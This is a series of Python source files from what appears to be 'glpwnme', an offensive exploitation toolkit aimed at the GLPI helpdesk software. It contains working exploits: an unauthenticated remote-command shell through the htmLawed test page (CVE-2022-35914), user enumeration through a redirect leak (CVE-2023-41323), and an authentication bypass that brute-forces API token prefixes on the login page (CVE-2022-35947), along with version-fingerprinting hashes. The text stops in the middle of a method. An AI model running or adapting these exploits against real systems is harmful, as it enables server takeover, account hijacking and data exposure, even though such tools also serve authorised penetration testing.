          <input type="text" class="form-control" id="login_name" name="fielda65df1117f0519" placeholder="" tabindex="1" />
          <input type="password" class="form-control" id="login_password" name="fieldb65df1117f051b" placeholder="" autocomplete="off" tabindex="2" />
          <input type="hidden" name="redirect" value="" />
          <input type="hidden" name="_glpi_csrf_token" value="49cd1ca5f931d1d7ae18c1153eeac1089f7ba14787086bda99ffd22c1df7b3c7" />
         </form>

         <select name='auth' id='dropdown_auth1369477226' class="form-select" size='1'>
             <option value='local'>GLPI internal database</option>
             <option value='ldap-1' selected>Utilisateurs internes</option>
             <option value='ldap-2'>Utilisateurs RSWL</option>
         </select>

    </body>
    </html>
    """
    print(GlpiUtils.extract_csrf(html_test))
    print(GlpiUtils.extract_login_field(html_test))
    print(GlpiUtils.extract_auth(html_test)) # ldap-1 shall be first



import requests
import re
import readline
from http import HTTPStatus
from ..exploit import GlpiExploit
from glpwnme.exploits.utils import GlpiUtils
from glpwnme.exploits.logger import Log
from bs4 import BeautifulSoup
from rich.prompt import Prompt

class CVE_2022_35914(GlpiExploit):
    """
    This exploits achieve unauth RCE on GLPI version vulnerable

    @author Mayfly
    @cvss 10
    @name CVE_2022_35914
    """
    _impacts = "RCE"
    max_version = "10.0.3"

    _array_regex = re.compile(r'\s+\[\d+\] => (.*)')
    _failed_regex = re.compile(r'\$spec: (\d+)')

    def _parse_result(self, html):
        """
        Parse the result of the command from the html DOM

        :param html: The html dom to parse
        :type html: Union[str, bytes]

        :return: The result of the command
        :rtype: str
        """
        soup = BeautifulSoup(html, 'html.parser')
        attrs = soup.find("div", attrs={"id": "settingF"})
        if attrs:
            result = re.findall(self._array_regex, attrs.text)
            if result:
                return "\n".join(result)

            error = re.findall(self._failed_regex, attrs.text)
            if error:
                return "\x1b[31mError:\x1b[0m " + error[0]
            return attrs.text.strip()
        return ""

    def infos(self):
        """
        This method is used to display the information of an exploit.
        This method support rich formatting

        :return: The whole informations about an exploit
        :rtype: str
        """
        infos = "[u]Description:[/u]\n"
        infos += "This exploit allow you to exploit arbitrary function call on a test library.\n"
        infos += "It result in an instant [u blue]Remote Code Execution[/]\n"

        infos += "\n[u]Usage:[/u]\n"
        infos += "[grey66]# Spawn a pseudo interactive shell[/]\n"
        infos += "--run\n"
        infos += "\nExploit is [green b]Safe[/]"
        return infos

    def check(self):
        """
        Check if the target is vulnerable
        """
        endpoint = "/vendor/htmlawed/htmlawed/htmLawedTest.php"
        res = self.get(endpoint, allow_redirects=False)
        if res.status_code == HTTPStatus.OK:
            return True
        return False

    def run(self):
        """
        Run the command on the vulnerable target

        :param command: The command to execute on the target
        :type command: str
        """
        endpoint = "/vendor/htmlawed/htmlawed/htmLawedTest.php"
        url = self.glpi_session.target + endpoint

        exploit = {
            "sid": "foo",
            "hhook": "exec",
            "text": ""
            }

        command = ""

        while True:
            command = Prompt.ask("[b yellow]mayfly@[/b yellow][b cyan]glpi[/b cyan] (quit/exit)\n")

            if(command == "exit" or command == "quit"):
                break

            cookie = GlpiUtils.random_str(12)
            exploit["text"] = command
            exploit["sid"] = cookie

            # Raw post request is enough, no need to add CSRF Tokens
            res = requests.post(self.glpi_session.r(endpoint), data=exploit, cookies={"sid": cookie}, verify=False)
            result = self._parse_result(res.text)
            if not result:
                Log.err("Command failed")

            else:
                print(result)
                print()



import time
import string
from http import HTTPStatus
from itertools import combinations
from urllib.parse import urlparse
from ..exploit import GlpiExploit
from glpwnme.exploits.logger import Log
from bs4 import BeautifulSoup
from glpwnme.exploits.utils import GlpiUtils

class CVE_2023_41323(GlpiExploit):
    """
    This CVE abuse an info leak on redirect for enumerating user

    @author JB Mesnard-Sense
    @cvss 3.0
    @name CVE_2023_41323
    """
    max_version = "10.0.10"
    _impacts = "Enum name and id of users (not exhaustive)"
    _privilege = "Unauthenticated"

    alphabet = string.ascii_lowercase + string.digits + '-.' # Am I missing char ? (2 parmi 39) = 741

    def __init__(self, glpi_session):
        """
        :param found_user: The dictionnary holding the collected datas
        :type found_user: Dict[int, str]
        """
        super().__init__(glpi_session)
        self.found_user = {}

    def infos(self):
        """
        This method is used to display the information of an exploit.
        This method support rich formatting

        :return: The whole informations about an exploit
        :rtype: str
        """
        infos = "[u]Description:[/u]\n"
        infos += "This exploit allow to recover some user on glpi, their name and id.\n"
        infos += "It will only recover user that have a unique prefix.\n"
        infos += "[u]For instance:[/]\n - ab1 and ab2 will result in no match."
        infos += "\n - ab1 and ac1 will result in a finding.\n"

        infos += "\n[u]Params:[/u]\n"
        infos += " - [i]username (optionnal)[/i]: The prefix from which to start enumerating usernames\n"

        infos += "\n[u]Usage:[/u]\n"
        infos += "[grey66]# Enum users starting with ab[/]\n"
        infos += "--run -O username=ab\n"

        infos += "\n[grey66]# Try to enum users[/]\n"
        infos += "--run\n"

        infos += "\nExploit is [green b]Safe[/]"
        return infos

    def _get_user_id(self, name):
        """
        Start the enumeration of the user

        :return: The user id found, None if not found
        :rtype: int
        """
        res = self.get(f"/front/user.form.php?name[0]=LIKE&name[1]={name}", allow_redirects=False)
        location = res.headers.get("Location")
        if location:
            user_id = urlparse(location).query.split("=")[1]
            if user_id:
                return int(user_id)
        return None

    def _add_user_id(self, user_id, username):
        """
        Add user id in the self dictionnary
        """
        if user_id:
            Log.msg(f"Found id {user_id} for name: {username}")
            self.found_user[user_id] = username

    def _enum_user_with_prefix(self, current_name):
        """
        Enum the current user name
        """
        current = current_name
        ENUMERATING = True
        while ENUMERATING:
            for char in self.alphabet:
                Log.log(f"Trying {current}{char}      ", end="\r")
                user_id = self._get_user_id(current + char + "%")
                if user_id:
                    potential_user = self._get_user_id(current + char)
                    if potential_user:
                        self._add_user_id(potential_user, current + char)
                        ENUMERATING = False
                        break
                    else:
                        self._enum_user_with_prefix(current + char)
                        continue

            ENUMERATING = False


    def run(self, username=""):
        """
        Run the exploit on the target. By default it will try to enumerate all the
        usernames of the target instance.

        :param username: The prefix of the username to look for
        :type username: str

        :param max_length: The maximum length of a username
        :type max_length: Union[str, int]
        """
        prefix = username
        if username:
            Log.msg(f"Trying to enumerate username on the application starting with [blue]{prefix}[/blue]")
            self._add_user_id(self._get_user_id(username), username)
        else:
            Log.msg(f"Trying to enumerate username on the application")

        if prefix:
            self._enum_user_with_prefix(prefix)

        else:
            for char in self.alphabet:
                current_try = prefix + char
                self._enum_user_with_prefix(current_try)

        if self.found_user:
            Log.msg(f"Found {len(self.found_user)} users on the target")
            print(f"| id | name |")
            for user_id, username in self.found_user.items():
                print(f"| {user_id} | {username} |")
        else:
            Log.err(f"No user found")



import time
from http import HTTPStatus
from ..exploit import GlpiExploit
from glpwnme.exploits.logger import Log
from bs4 import BeautifulSoup
from glpwnme.exploits.utils import GlpiUtils

class CVE_2023_41320(GlpiExploit):
    """
    This CVE abuse something...

    @author <author_name>
    @cvss <score_cvss>
    @name <exploit_name>
    """
    min_version = "<min_version>" # Default: 0 (min_version will be checked with <=)
    max_version = "<max_version>" # Default: inf (max_version will be checked with < strictly)
    min_php_version = "<min_version>" # Default: 0
    max_php_version = "<max_version>" # Default: inf
    _impacts = "<impacts_of_exploits>" # What are the impacts of this exploits shortly ?
    _privilege = "<Unauthenticated|User|Hotliner|Observer|Technician|Supervisor|Admin|SuperAdmin>" # Default: Unauthenticated
    _is_check_opsec_safe = False # Whether or not the check is opsec safe, Default: True
    require_api = False # Whether or not the exploit require the api to be enabled, default: False
    require_inventory = False # Whether or not the exploit require the inventory to be enabled, default: False

    def infos(self):
        """
        Infos that will be displayed to the user when using --infos argument

        :return: The infos about this exploit (rich formatted)
        :rtype: str
        """
        infos = "[u]Description:[/u]\n"
        infos += "\n[u]Usage:[/u]\n"
        infos += "\nExploit is [green b]Safe[/]" # or Unsafe ?
        return infos

    def check(self):
        """
        Check if the target is vulnerable

        This method is optionnal, if it is not implemented, glpwnme
        will only checks if the version matches

        :return: True if the target is vulnerable, False otherwise
        :rtype: bool
        """
        raise NotImplementedError

    def clean(self):
        """
        Optional method that will clean the traces,
        can take any arguments as the run method
        """
        raise NotImplementedError

    def run(self):
        """
        Run the exploit on the target
        You can add any argument on this function
        """
        raise NotImplementedError



import inspect
from glpwnme.exploits.logger import Log
from .exceptions import ExploitNotOpsecException

class ExploitOrchestrator:
    """
    This class is the orchestrator of the exploits
    available
    It will be used to call the right function with the right arguments
    depending of the user input
    """
    def __init__(self, exploits):
        self.exploits = exploits

    @staticmethod
    def display_exploits(exploits):
        """
        List all the exploits in a table

        :param exploits: The list of exploits class
        :type exploits: List[class:`exploits.GlpiExploit`]
        """
        if not exploits:
            return

        table = exploits[0].get_table_header("Exploit List")
        table.add_column("Options", style="blue")
        for exp_class in exploits:
            params = ExploitOrchestrator.get_function_params(exp_class)
            params_display = ",".join(params["required"]) + ",".join(params["optional"])
            table.add_row(*exp_class.get_row(), params_display)
        Log.print(table)

    @staticmethod
    def get_function_params(exploit, func_name="run"):
        """
        Return the functions parameters of an exploit
        
        :param exploit: The exploit on which to look
        :type exploit: class:`GlpiExploit`

        :param func_name: The name of the function to check
        :type func_name: str
        """
        parameters = {"required": [], "optional": []}
        if not hasattr(exploit, func_name):
            return parameters

        signature = inspect.signature(getattr(exploit, func_name))
        for param_name, default in signature.parameters.items():
            if default.default is not default.empty:
                # Parameters is optional, default.annotation shall return the type if given
                # default.annotation --> <class 'inspect._empty'> | <class 'int'> | ...
                parameters["optional"].append(param_name)
            else:
                parameters["required"].append(param_name)
        return parameters

    @staticmethod
    def is_missing_param(params, options=None):
        """
        Check if params are missing from the options
        given by the user

        :param params: The dictionnary containing the required and optionnal params
        :type params: Dict[str, List[str]]

        :param options: The dict containing the options given by the user
        :type options: Dict[str, str]

        :return: Whether or not a param is missing
        :rtype: bool
        """
        if options is None:
            options = {}

        for required in params["required"]:
            if required not in options.keys():
                return True
        return False

    @staticmethod
    def build_usage(params):
        """
        Build the options required for the exploit

        :return: The usage of the command
        :rtype: str
        """
        usage = f"-O "
        for param in params["required"]:
            usage += f'"{param}=<value>" '

        for param in params["optional"]:
            usage += f'"{param}=<?value>" '
        return usage.strip()

    def recover_exploit_named(self, name):
        """
        Recover an exploit class from the name given by the user
        This function is case insensitive

        :param name: The name of the exploit to use
        :type name: str

        :return: The exploit to use
        :rtype: class:`exploits.GlpiExploit`
        """
        for exploit in self.exploits:
            classname = exploit.__class__.__name__
            if exploit.metadatas.name != "":
                if(exploit.metadatas.name.lower() == name.lower()
                    or classname.lower() == name.lower()):
                    return exploit
        return None

    def _run_check(self, exploit, opsec_only=True):
        """
        Run the check function on an exploit and returns its result
        """
        Log.log("Starting check")
        failed_message = "Target seems not vulnerable"
        try:
            if exploit.start_check_workflow(opsec_only):
                Log.msg("Target seems vulnerable")
                return True

        except Exception as e:
            failed_message = f"Got error: {e}"
        Log.err(failed_message)
        return False

    def check_exploit(self, exploit_name, opsec_only=True):
        """
        Check if the target is vulnerable to a specific exploit

        :param exploit_name: The name of the exploit (Case insensitive)
        :type exploit: str

        :param force: Force the call to check function
        :type force: bool

        :return: Whether or not the target is vulnerable
        :rtype: bool
        """
        exploit = self.recover_exploit_named(exploit_name)
        if not exploit:
            Log.err(f"Cannot find the exploit named: {exploit_name}")
            return False

        if exploit.requirement_check():
            Log.msg("Requirements seems ok")
            return self._run_check(exploit, opsec_only)

        return False

    @staticmethod
    def _has_checked_method(exploit):
        """
        Check if the exploit has a method named check

        :param exploit: The exploit to check
        :type exploit: class:`GlpiExploit`

        :return: Whether the exploit has a check method or not
        :rtype: bool
        """
        return hasattr(exploit, "check") and callable(getattr(exploit, "check"))

    def get_checked_exploits(self, opsec_only=True):
        """
        Check all exploits against the target and
        return those who validated the check

        :param opsec_only: Whether or not to check the exploit that are not opsec safe
        :type opsec_only: bool
        """
        checked_exploit = []
        for exploit in self.exploits:
            Log.log(f"Checking [red]{exploit.__class__.__name__}[/red] ", end="\r")
            try:
                if not ExploitOrchestrator._has_checked_method(exploit):
                    version_target = exploit.glpi_session.glpi_infos.glpi_version
                    if exploit.are_requirements_checked():
                        Log.print(f":high_voltage: [bright_yellow]{exploit.__class__.__name__}[/bright_yellow]: Version seems vulnerable !",
                                  end="\x1b[K\n")
                        checked_exploit.append(exploit)
                    else:
                        Log.print(f"[red]:x:[/red] [red]{exploit.__class__.__name__}[/red] Version not vulnerable",
                                  end="\x1b[K\n")

                elif exploit.start_check_workflow(opsec_only):
                    checked_exploit.append(exploit)
                    Log.print(f"[green]:white_check_mark:[/green] Checking [b green]{exploit.__class__.__name__}[/b green]",
                              end="\x1b[K\n")
                else:
                    Log.print(f"[red]:x:[/red] Checking [red]{exploit.__class__.__name__}[/red]",
                              end="\x1b[K\n")

            # Those errors might happen if you check exploit that requires credentials
            # but do not provide any
            except (ExploitNotOpsecException, ValueError) as e:
                if exploit.are_requirements_checked():
                    Log.print(f":high_voltage: [bright_yellow]{exploit.__class__.__name__}[/bright_yellow]:"
                              f" [b]{e}[/b], however version seems vulnerable !")
                    checked_exploit.append(exploit)
                else:
                    Log.print(f"[red]:x:[/red] [red]{exploit.__class__.__name__}[/red]: [b]{e}[/b]",
                              end="\x1b[K\n")

            except Exception as e:
                Log.print(f"[red]:x:[/red] [red]{exploit.__class__.__name__}[/red]: [b]{e}[/b]",
                          end="\x1b[K\n")
        return checked_exploit

    def run_exploit(self, exploit_name, options=None):
        """
        Run the exploit on the target

        :param exploit_name: The name of the exploit (Case insensitive)
        :type exploit: str

        :raises ValueError: If options are missing for running the function
        """
        if not options:
            options = {}

        exploit = self.recover_exploit_named(exploit_name)
        if not exploit:
            Log.err(f"Cannot find the exploit named: {exploit_name}")
            return

        params = self.get_function_params(exploit)
        if self.is_missing_param(params, options):
            Log.err(f"Wrong usage, missing options:")
            print("```" + self.build_usage(params) + "```")
            Log.err(f"Exiting...")
            exit(0)

        exploit.start_run_workflow(**options)

    def clean_exploit(self, exploit_name, options=None):
        """
        Clean the exploit's traces on the target

        :param exploit_name: The name of the exploit (Case insensitive)
        :type exploit: str

        :raises ValueError: If options are missing for running the function
        """
        if not options:
            options = {}

        exploit = self.recover_exploit_named(exploit_name)
        if not exploit:
            Log.err(f"Cannot find the exploit named: {exploit_name}")
            return

        params = self.get_function_params(exploit, func_name="clean")
        if self.is_missing_param(params, options):
            Log.err(f"Wrong usage, missing options:")
            print("```" + self.build_usage(params) + "```")
            exit(0)

        exploit.start_clean_workflow(**options)

    def get_header_infos(self, exploit):
        """
        Get some header information about an exploit

        :param exploit: The exploit from which to show infos
        :type exploit: class:`GlpiExploit`

        :return: The infos about the exploit
        :rtype: str
        """
        exploit_name = exploit.__class__.__name__
        exploit_author = exploit.metadatas.author
        exploit_score = exploit.metadatas.cvss
        exploit_privs = exploit.privilege.name

        min_version = exploit.requirements.glpi_version.min_version
        max_version = exploit.requirements.glpi_version.max_version

        header = f"[b]{exploit_name}[/]\nCVSS: {exploit_score}/10\n"
        header += f"Author: [dodger_blue1]{exploit_author}[/]\n"
        header += f"Privileges required: [dodger_blue1]{exploit_privs}[/]\n"
        header += f"[dodger_blue1]Vulnerable[/] from Version {min_version} and strictly below {max_version}\n"
        return header

    def show_infos_about(self, exploit_name):
        """
        Show infos about an exploit

        :param exploit_name: The name of the exploit (Case insensitive)
        :type exploit: str
        """
        exploit = self.recover_exploit_named(exploit_name)
        if not exploit:
            Log.err(f"Cannot find the exploit named: {exploit_name}")
            return

        infos_method = getattr(exploit, "infos", None)
        if callable(infos_method):
            Log.print(self.get_header_infos(exploit))
            Log.print(infos_method())

        else:
            Log.err(f"infos method is not implemented in [red]{exploit_name}[/]")

    def get_potential_exploits(self):
        """
        Return the potential exploit by checking the versions
        """
        potential_exploits = []
        for exploit in self.exploits:
            if exploit.requirement_check():
                potential_exploits.append(exploit)
        return potential_exploits



from http import HTTPStatus
from dataclasses import dataclass
from .glpi_utils import sha1

@dataclass
class StaticFile:
    NOT_FOUND = 0
    EXISTS = 1

class GlpiStaticFilesVersion:
    """
    Class that gather all version and files that has been modified
    from glpi 10.0.0 to latest version of glpi
    """
    STATIC_FILES_VERSION = {
        "10.0.0": {
            "js/Forms/FaIconSelector.js": "31440690bc98e669023548bd9ff47c03f80bae93",
            "js/RichText/ContentTemplatesParameters.js": "7a52232febba99d6ee5d77fda897d483ad414ce9",
            "js/RichText/UserMention.js": "49b9f47e7198723e8e3cc40f3a79b812fe9033be"
        },
        "10.0.1": {
            "js/Forms/FaIconSelector.js": "14f368a22d3b4a5821f67faf3fd9ede5e1cb6583",
            "js/RichText/ContentTemplatesParameters.js": "940da7c1bedd78d46a51b55d5ecb53e90d7cb59c",
            "js/modules/Kanban/Kanban.js": "ae6411ac4599f567f2b1bbf98ae55d35d6d917b6"
        },
        "10.0.2": {
            "js/modules/Kanban/Kanban.js": "d0386ea1703e0b49b46440fb20c10c77be76f197",
            "js/common.js": "c45dd1752057aa49582b6d086373f202b8ecaf0f",
            "js/fileupload.js": "d576224682a28fac94a277bcf7e71ef3747fc5ab"
        },
        "10.0.3": {
            "js/common.js": "0f8b033ed14dc7d1c72101022d5deeb319310fa6",
            "js/fileupload.js": "652ca90f1dcfbb51ac9bc20e7df8aeb3899d9cfa",
            "js/impact.js": "c0dec7529eda3bf5f9b769369b572dbdc81a2588"
        },
        "10.0.4": {
            "js/common.js": "35c8b03170a66e7429c862a920800ab5882bdda4",
            "js/dashboard.js": "0959880f62c98022c1254eaa436d0f78932211e3",
            "js/fileupload.js": "3a135fd45ecd15bcef9240393b5777a101f252a4"
        },
        "10.0.5": {
            "js/Forms/FaIconSelector.js": "14f368a22d3b4a5821f67faf3fd9ede5e1cb6583",
            "js/RichText/ContentTemplatesParameters.js": "940da7c1bedd78d46a51b55d5ecb53e90d7cb59c"
        },
        "10.0.6": {
            "js/Forms/FaIconSelector.js": "b190061923d1d0fef224d6d47a845e912988bc7b",
            "js/RichText/ContentTemplatesParameters.js": "caaa28a34c2f0c53fdee1e958b1d0777b90131fd",
            "js/fileupload.js": "3181326791c9b2438ccae45452e39d697a570a40"
        },
        "10.0.7": {
            "js/common.js": "4d90fb75e30b84502bbf4a14131da987f1327a5b",
            "js/dashboard.js": "cfe35fb62edfdd713f4110833effb53dbfc001b5",
            "js/fileupload.js": "c68872daac04eb8959b210c970a922e5aaffaee3"
        },
        "10.0.8": {
            "js/common.js": "0d298299d0a94f010b3e7f0f292b87382203f94b",
            "js/dashboard.js": "65cd05628bba57e833a8aef8560e75d0840af0c9",
            "js/glpi_dialog.js": "87db9b200df67473cc7f4e233b554aea8f9b9b98"
        },
        "10.0.9": {
            "js/dashboard.js": "65cd05628bba57e833a8aef8560e75d0840af0c9",
            "js/fileupload.js": "c68872daac04eb8959b210c970a922e5aaffaee3",
            "js/modules/Kanban/Kanban.js": "d451bf837532b399f3046091d792cf2bc5035a9a"
        },
        "10.0.10": {
            "js/dashboard.js": "0452c596670f4dc16a5a2c8a916eabc31f21de3a",
            "js/fileupload.js": "f219113896331ae9b4d332996a471ef8866abb24",
            "js/modules/Kanban/Kanban.js": "b7c98682448f2b91040ee2ea6b4dfa618a9f0fa6"
        },
        "10.0.11": {
            "js/fileupload.js": "2e217e9910b06740b03eaa4095d6ef424ee21b59",
            "js/common.js": "46809bd10d5d61ea27a1a9d2ebe8db7d3f02fcd3",
            "js/modules/Debug/Debug.js": "6dd42dcfe1a41f0cbe6b997f47e6456a22bfb89c"
        },
        "10.0.12": {
            "js/Forms/FaIconSelector.js": "96e8f8eb01d12a39b7a0ba71f2719f70c3775093",
            "js/RichText/ContentTemplatesParameters.js": "eddaefa64bfe0b1388e6168de339cc9b75da08c2",
            "js/planning.js": "97372206ca320ded89067d4d3718715d097cc2f3"
        },
        "10.0.13": {
            "js/modules/Debug/Debug.js": "9a3863e61897031b9a57ed16e98ffd986d2ac8a4",
            "js/modules/Kanban/Kanban.js": "d4e7241c6c4d7ea752318a470d386b2c8917443f",
            "js/planning.js": "efc242378e54623df98337a433ec2952eef29f73"
        },
        "10.0.14": {
            "js/RichText/ContentTemplatesParameters.js": "eddaefa64bfe0b1388e6168de339cc9b75da08c2",
            "js/RichText/UserMention.js": "972f37b7d8a5128bc3a1b6db085ff2b27cdcba47",
            "js/planning.js": "efc242378e54623df98337a433ec2952eef29f73"
        },
        "10.0.15": {
            "js/RichText/ContentTemplatesParameters.js": "baf7496688ef4284d030f9172159eea1e1ab6c32",
            "js/RichText/UserMention.js": "2e0cb3639ed9ddcf1fb21e8631309939aa058edd",
            "js/impact.js": "f99ae7cd9de10862fefeb51b5b0ab5133e34de41"
        },
        "10.0.16": {
            "js/impact.js": "2b1d065c23a53c03d15d313bedd918de587c3bfa",
            "js/common.js": "80be4330869288ba998a945692766e677d8be696",
            "js/planning.js": "55d14c857004bb88ed0e9ae2ac0faef286d9b6c8"
        },
        "10.0.17": {
            "js/common.js": "ab2d35e2864d71ff9b16d13934f6674dca693c00",
            "js/planning.js": "b027e9ca19cbfbcf5391ac3b9fc6221f305cd3e3",
            "js/RichText/UserMention.js": "2e0cb3639ed9ddcf1fb21e8631309939aa058edd"
        },
        "10.0.18": {
            "js/clipboard.js": "dcc537e1a938ff8e0c5fe32d8dd119636d8c29c7",
            "js/planning.js": "46a0ae65680e3d092e23f5fdf9d2c96d5567137b",
            "js/RichText/UserMention.js": "4beefa891b1437453c922e98d69f21f3f6ad6a3c"
        },
        "10.0.19": {
            "js/planning.js": "36a18b30ad3948a6163c19fd6664b995d81c585d",
            "js/impact.js": "e9e01a05eebb8eef1787c196e7c3834293491815"
        },
        "10.0.20": {
            "js/impact.js": "dc352017fa305d810e8144446671066252b254da",
            "js/RichText/UserMention.js": "62760764f680a1861ef4cf6e563368937ab2e92b",
            "js/Forms/FaIconSelector.js": "ef444e6052b42d60ccff4486fe7515f44b008031",
        },
        "11.0.0": {
            "js/Forms/FaIconSelector.js": "ef111bef678aaab65ae497423dde92f32da418a2",
            "js/RichText/ContentTemplatesParameters.js": "ab7411da2c09cc59822c6538cbaeb7cc9e66c5d9",
            "js/common.js": "cb4e231b100ef3be742d73e2684857e39fd2df20",
            "js/common_ajax_controller.js": "fcf426336bd0342803b08b057075e1ab65206243",
        },
        "11.0.1": {
            "js/common.js": "aa9d208f175e4e04c5dc263680578fec2fede30b",
            "js/common_ajax_controller.js": "a12b096652c2ec433480e5de3e0681ffb559e9b7",
        }
    }

    STATIC_FILES_MAJOR_VERSION = {
        "10.0.0": {
            "js/RichText/FormTags.js": StaticFile.NOT_FOUND,
            "front/helpdesk.html": StaticFile.EXISTS
        },
        "11.0.0": {
            "front/helpdesk.html": StaticFile.NOT_FOUND,
            "js/modules/Forms/EditorController.js": StaticFile.EXISTS
        }
    }

    @classmethod
    def _check_res(cls, expected, html_result):
        return ((expected == StaticFile.NOT_FOUND
                 and html_result.status_code == HTTPStatus.NOT_FOUND)
                or
                (expected == StaticFile.EXISTS and html_result.status_code == HTTPStatus.OK)
                or
                (expected == sha1(html_result.content)))

    @classmethod
    def get_minor_from_major(cls, version):
        """
        Return the versions associated to a major version

        :return: The dict of the versions associated to a major version
        :rtype: Dict[str, Dict[str, Union[int, str]]]
        """
        major_version = version.split(".")[0]
        return {version: val for version, val in cls.STATIC_FILES_VERSION.items()
                             if version.startswith(major_version)}

    @classmethod
    def is_result_valid(cls, version, file, html_result):
        """
        Check if a result is valid given:
          - version checked
          - file path used
          - html result obtained

        :param version: The version we are testing
        :type version: str

        :param file: The file path that was requested
        :type file: str

        :param html_result: The result of the get request to the file
        :type html_result: requests.models.Response
        """
        if file in cls.STATIC_FILES_MAJOR_VERSION.get(version, {}):
            expected_result = cls.STATIC_FILES_MAJOR_VERSION[version][file]
            if not cls._check_res(expected_result, html_result):
                return False

        if file in cls.STATIC_FILES_VERSION.get(version, {}):
            expected_result = cls.STATIC_FILES_VERSION[version][file]
            if not cls._check_res(expected_result, html_result):
                return False
        return True

    @classmethod
    def get_major(cls):
        return cls.STATIC_FILES_MAJOR_VERSION

    @classmethod
    def potential_version_from_hash(cls, static_hash):
        """
        Get the potential version of the target from a given static_hash
        """
        versions = []
        for version, path_hash_combo in cls.STATIC_FILES_VERSION.items():
            if static_hash in path_hash_combo.keys():
                versions.append(version)
                continue
        return versions

    @classmethod
    def get_diff(cls, version1, version2):
        """
        Return files that differs between two versions

        :rtype: List[str]
        """
        first_hash = cls.STATIC_FILES_VERSION[version1]
        second_hash = cls.STATIC_FILES_VERSION[version2]
        diff_files = []
        for file, file_hash in first_hash.items():
            if(file in second_hash.keys() and file_hash != second_hash[file]):
                # Same file different hash
                diff_files.append(file)
        return diff_files



import itertools
import re
from http import HTTPStatus
from ..exploit import GlpiExploit
from glpwnme.exploits.logger import Log


class CVE_2022_35947(GlpiExploit):
    """
    Unauthenticated authentication bypass via PHP type-juggling on user_token, driven
    from the LOGIN PAGE (GLPI 9.1 - 10.0.2, GHSA-7p3q-cffg-c8xh).

    The "login with external token" flow passes user_token straight to
    User::getFromDBbyToken() with no string check (Auth.php, case self::API):

        if ($user->getFromDBbyToken($_REQUEST['user_token'], 'api_token')) { ... log in ... }

    getFromDBbyToken -> getFromDBByCrit(['api_token' => $token]). Supplied as a PHP array
    via bracket notation, $token becomes an [operator, value] pair that DBmysqlIterator
    renders into the SQL criterion:

        WHERE glpi_users.api_token <operator> '<value>'

    getFromDBByCrit() returns a user only when the criterion matches EXACTLY ONE row, so
    the naive api_token >= '' matches every token and fails. The reliable primitive is to
    isolate one row with LIKE: user_token[0]=LIKE & user_token[1]=<prefix>% builds
    api_token LIKE '<prefix>%'. A prefix matching exactly one api_token logs that user in.

    Crucially this works from /front/login.php itself, NOT just /apirest.php: a request
    with user_token in the query string and NO noAUTO reaches Auth::checkAlternateAuthSystems
    -> self::API -> getFromDBbyToken. The login page is almost always reachable, so this
    bypasses the REST App-Token and apiclient IPv4 filtering entirely. A GET is enough
    (no CSRF on the redirect path); a single isolated match returns 302 -> /front/central.php
    with an authenticated session cookie.

    Enumeration: MySQL LIKE is case-insensitive, so the useful alphabet is [0-9a-z] (36).
    A single character usually matches several tokens (count > 1, no login), so the walk
    uses fixed-length combinations: 2 by default, raise with -O combination_size=3.

    Fix (GLPI 10.0.3, commit 564309d2c118): getFromDBbyToken() returns false when the
    token is not a string, so the array criterion is rejected outright.

    Precondition: "Enable login with external token" (enable_api_login_external_token) is
    on (default) and at least one user has an api_token. No REST API access required.
    Not exploitable on a stock install (no user has an api_token by default), which is why
    the score is 7.5 and not critical: it depends on a user having generated an api_token.

    Impact: the session is minted at the token holder's privilege. If a Super-Admin holds an
    api_token (common once the REST API is used), this is an unauthenticated path to a full
    Super-Admin session. Validated on 10.0.2: the isolated glpi session reaches the
    Super-Admin-only config and user-list pages, while an isolated Technician session is
    denied on the same pages. A Super-Admin then reaches RCE through the normal plugin
    install path, so a single api_token-bearing admin turns this into unauth-to-RCE.

    @author M00nBack
    @cvss 7.5
    @name CVE_2022_35947
    """
    _impacts = "Authentication Bypass, Privilege Escalation"
    _privilege = "Unauthenticated"
    _is_check_opsec_safe = True
    # split range: the bug is gone in the 9.5.x line at 9.5.9, separately from the 10.0.3 fix
    min_version = ("9.1.0", "10.0.0")
    max_version = ("9.5.9", "10.0.3")

    _LOGIN = "/front/login.php"
    # GLPI api_token is random [a-zA-Z0-9]; letters outnumber digits, so a letter is the
    # likelier first char. LIKE is case-insensitive, so the useful alphabet is [a-z0-9].
    _ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"

    # ------------------------------------------------------------------ #
    # primitive                                                            #
    # ------------------------------------------------------------------ #

    def _login_with_prefix(self, prefix):
        """Drive the login-page type-juggling: GET /front/login.php with
        user_token[0]=LIKE & user_token[1]=<prefix>% and NO noAUTO. If exactly one
        api_token matches, GLPI logs that user in and redirects away from the login page.
        Returns an authenticated session on success, else None."""
        Log.log(f"Trying prefix: {prefix} ", end="\r")
        s = self.glpi_session.get_fresh_session_copy()
        url = self.glpi_session.r(self._LOGIN)
        try:
            # establish a PHP session first; checkAlternateAuthSystems only processes
            # user_token once a session cookie exists (a cold request does not authenticate)
            s.get(url, verify=False, allow_redirects=True, timeout=15)
            r = s.get(url, params={"user_token[0]": "LIKE", "user_token[1]": prefix + "%"},
                      verify=False, allow_redirects=False, timeout=15)
        except Exception:
            return None
        loc = r.headers.get("Location", "")
        # success is any post-auth redirect off the login page (central.php for a central
        # user, helpdesk for a self-service token holder); a failed attempt re-renders login
        if r.status_code in (HTTPStatus.MOVED_PERMANENTLY, HTTPStatus.FOUND) and loc and "login.php" not in loc:
            return s
        return None

    def _whoami(self, sess):
        """Read the logged-in user's login name and id from the Preference User tab
        (/ajax/common.tabs.php ... _glpi_tab=User$1), which renders both id and name on
        9.x and 10.x (the plain preference.php form does not)."""
        tab = ("/ajax/common.tabs.php?_target=/front/preference.php"
               "&_itemtype=Preference&_glpi_tab=User$1")
        try:
            h = sess.get(self.glpi_session.r(tab), verify=False, allow_redirects=False, timeout=15).text
        except Exception:
            return None, None
        uid = re.search(r"name=['\"]id['\"]\s+value=['\"](\d+)['\"]", h)
        name = (re.search(r"name=['\"]name['\"]\s+value=['\"]([^'\"]*)['\"]", h)
                or re.search(r"Login:\s*([^<\s]+)", h))
        return (uid.group(1) if uid else None), (name.group(1) if name else None)

    def _combos(self, size):
        for t in itertools.product(self._ALPHABET, repeat=size):
            yield "".join(t)

    # ------------------------------------------------------------------ #
    # interface                                                            #
    # ------------------------------------------------------------------ #

    def infos(self):
        infos = "[u]Description:[/u]\n"
        infos += "Unauthenticated auth bypass via [i]user_token[/i] PHP type-juggling, from the\n"
        infos += "[b]login page[/b] (GLPI 9.1 - 10.0.2). [b]/front/login.php[/b] with\n"
        infos += "[i]user_token[0]=LIKE & user_token[1]=<prefix>%[/i] (no [i]noAUTO[/i]) reaches\n"
